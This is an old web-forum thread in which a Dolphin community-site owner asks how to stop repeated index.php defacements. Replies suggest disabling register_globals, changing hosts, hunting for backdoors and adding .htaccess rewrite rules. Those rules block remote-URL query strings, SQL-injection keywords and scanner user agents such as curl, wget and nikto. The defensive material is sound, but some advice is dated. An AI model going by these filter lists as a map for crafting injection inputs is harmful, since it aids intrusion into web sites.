Index.php keeps getting hacked. Please help

wowheaded posted 2nd of October 2008 in Community Voice. 13 comments.

Hi guys and girls,

 

Thanks for all the help with the previous problem. I did as suggested and the site is now working as it should again.

 

Just got one other little problem now. I've been hacked twice in the space of 2 weeks. It's not really a bad hack as such, but some idiots are getting in and replacing my index.php file with their stupid little "U Been Haxed By...." rubbish. Obviously, it's easy to fix the initial hack, but how do I stop this from happening again and again?

 

I've changed the PW's to my admin and hosting account, and will have to do that again today.

 

Is there any inclusions I need to make into the files to stop this again? Do I need to alter any permissions? Any ideas what to do?

 

Thanks in advance!

 
Comments
·Oldest
·Top
Please login to post a comment.
wowheaded
I've just added the code:
if (isset($_REQUEST['dir']))
die ('Hacking attempt');
to the files Sammie suggested in another post. I'm hoping this will help some.

Is there anything else I should do?
wowheaded
Just to let you know, this is the hacker's name: Arianom De HackeR

This is the IP it came from: 193.67.33.2

You might want to block it.

Also, what's with the /ray/crossdomain.xml file? Could this be a potential security issue?
sammie
that fix will stop them, the crossdomain file is just a file to allow flash to be used from one domain to another, without it you cant see flash from other sites.

get hosted on more safer servers
AndreyP
Again and again: php_flag register_globals Off :-)
better if not just via .htaccess - at host level.
second - disable all possible script of flash includes (better any html).
Third, was good solution too:

#RewriteCond %{QUERY_STRING} ^http [OR]
#RewriteCond %{QUERY_STRING} ^.+www\. [OR]
#RewriteCond %{QUERY_STRING} ^.+https [OR]
#RewriteCond %{QUERY_STRING} ^.+ftp
#RewriteRule .* - [L,F]
#RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
#RewriteCond %{HTTP_USER_AGENT} ^Wget
#RewriteRule see more .* - [F]

#RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
#RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
#RewriteRule ^(.*) - [F]

and even php_value allow_url_fopen 0 :-)
wowheaded
Thanks for the feedback. I seem to have a lot of trouble with my hosting at the moment, which is bad seens it is linked to a number of other sites I own. Being evasive about what and why, but as nothing seems to be safe right now, it's best to say little.

I'm actually considering adding sites to an additional hosting company, even though the one we currently use is listed on the boonex server page here. I noticed today that a number of functions over all the websites are messed up from the cPanel see more access, and according to the company, it's a corruption their end.
wowheaded
Also, with :

php_flag register_globals Off

Where do I change this specifically?

This is my first major dabble with php and mysql, so I'm not sure. CSS/XHTML/XML, I'm fine...PHP...you've lost me:D
LeonidS
Thi scommand should be placed to .htaccess file in root Dolphin directory.
sammie
If you are on shared hosting and Register_globals are on by default at the server level. and your php is 4.3.2 or later,. then you hosting provider has broken php.net's recommended settings of register_globals off and has even changed the default setting to On.

this allows any site on that server to be exploited and gain full access to all sites and accounts on that server. this is your hosting companies fault, and their blatent abuse of their customers trust in not providing safe secure hosting see more by following php.net's recommended settings for Register_globals
Tallyplayer
Also wowhead, look in your cache and backup directories specifically. All this security you are setting up may be locking the door after the thief is already in the store. When my sites were hacked they did pretty much what you described, I guess to stop me from loking deeper. If they were in then they probably already have set up the scripts somewhere to let them keep coming back. Although DosDawg helped me lock the door on my old hosting, they already had a key to the backdoor. End solution, see more I had to completely move off my poor hosting environment, moved in with Dos, and Sammie, and they keep all the door to door salesmen away!
wowheaded
Hi both,

I've just looked at my cache and backup directories. Both of those are absolutely fine, from what I can see. They both seem to have the relevant files included and no abnormalities in there. That's one big relief.

Right now, I'm going through all the files and folders in my hosting and comparing them to the dolphin/ray/orc unzipped files. I'll post if I find something odd that I just can't figure out :).

With regards to my hosting, I actually have a reseller account with this see more company listed within the boonex site. I'll email them again today and ask them what the deal is with the Register_globals issue. I noticed that even though we're supposed to have access to a number of additional features with them to control our hosting plan, we actually don't.
gameutopia
as andreyp mentions these are good ideas, however the commands to add to .htaccess he specifies will do abosolutely no good because the are commented out with the #

Basically if you add a # to your .htaccess each line with the # means to ignore it and do no good. So I don't know why this was even posted or why it wasn't clarified that you need to remove the # to do any good and to take affect. Guess everyone is supposed to know that by default.

#RewriteCond %{QUERY_STRING} ^http [OR]
#RewriteCond see more %{QUERY_STRING} ^.+www\. [OR]
#RewriteCond %{QUERY_STRING} ^.+https [OR]
#RewriteCond %{QUERY_STRING} ^.+ftp
#RewriteRule .* - [L,F]
#RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
#RewriteCond %{HTTP_USER_AGENT} ^Wget
#RewriteRule .* - [F]

#RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
#RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
#RewriteRule ^(.*) - [F]

and even php_value allow_url_fopen 0 :-)

I haven't tested it fully you will havet to remove the:
and even php_value allow_url_fopen 0 :-)

And all #'s to work at all. If you were to use this command in .htaccess it would be more like:
RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]

RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]

all your other dolphin .htaccess code would follow here!!

I wouldn't be surprised if some of this made certain thing not work specifically your share files in your media locations such as:
when you click on your share link in photo, music, and video gallery in the actions menu. The above code will block it. Is this all bad I don't know. But it will piss some off. Either that if you use the above code you will have to remove the share link to do away with it.

The code I use is similar to boonex guys except mine already has the #'s removed so they do work:
Options -MultiViews
Options -Indexes
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+\.txt [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww-perl|curl|wget|python|nikto|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]


I also block a number of things such as .htaccess, so you can't view my .htacess files, I also block certain countries. I do block peridic file, I also block file types that can be uploaded to audio video like php, txt, vbs, cgi, pl, etc. you name it. Anything that is out of the ordinary can't even be uploaded to dolphin/ray folders to begin with.

Good luck.
Gameutopia
I will post my boonex profile until I am told not too? Seem legit to me since it is hosted on boonex right?
http://www.boonex.com/unity/gameutopia
billabongrob
Sammie, you do realize that you can turn off register globals in the .htaccess file, right?
robertsearle
Yes you can, however, that only turns it off on that one website in a shared hosting enviroment.

I believe the server can be configured as to what is allowed in the local .htaccess files.

As mentioned, once a site is hacked all sites on the server are accessible. Even if your hostheader website is protected it is accessible from another website on the same server. It really needs turned off at the server level or you should consider changing your hosting provider.

If register globals can see more be turned off, it is reasonable to assume register globals can be turned on. So one hostheader/virtual website can compromise security for the rest of the shared hosting server.

I just left my last hosting company because a poorly written ComDEV photo album application kept getting exploited. It turned out my clients competitor signed up for multiple accounts until they landed on the same server their site was on.
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.10298609733582